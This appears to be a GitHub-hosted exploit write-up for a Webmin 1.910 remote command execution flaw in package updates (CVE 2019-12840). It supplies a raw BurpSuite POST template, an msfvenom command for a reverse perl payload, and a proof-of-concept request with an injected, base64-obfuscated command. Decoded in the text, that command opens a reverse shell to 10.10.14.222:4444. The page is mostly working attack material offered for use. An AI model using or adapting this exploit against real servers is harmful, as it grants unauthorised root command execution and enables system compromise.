-
Notifications
You must be signed in to change notification settings - Fork 4
/
Webmin 1.910 - Remote Code Execution using BurpSuite
67 lines (38 loc) · 2.93 KB
/
Webmin 1.910 - Remote Code Execution using BurpSuite
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Exploit Title: Webmin 1.910 - Remote Code Execution abusing Package Updates using BurpSuite
# Date: 11/13/19
# Exploit Author: BoxBois
# Version: Webmin 1.910
# Tested on: Linux
# CVE : 2019-12840
Exploit for webmin 1.910 Remote Command Execution vulnerability. If you have permission to login and update packages then you can remotely execute code as webmin (usually ran as root).
Use burp to make a post request to the webpage and paste the info below in your raw. Replace cookie's sid with your own sid, RHOST and RPORT to the victim IP and port, and PAYLOAD to your msfvenom generated payload. Have a nc listener running and enjoy your shell.
Basic msfvenom reverse perl payload creation script "msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl"
-------------------------------------------------
POST /package-updates/update.cgi HTTP/1.1
Host: [RHOST]:[RPORT]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=[INPUT GOOD SID HERE]
Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=[PAYLOAD HERE]
--------------------------------------------------------
Proof of concept
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.xxx:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=c6a571fc026f5565b3ea489081383bed
Referer: 10.10.10.xxx:10000/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7becho%2ccGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%22
--------------------------------------------------------
POC Payload Info
URL decoded
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"
base64 decoded
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
all together decoded
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"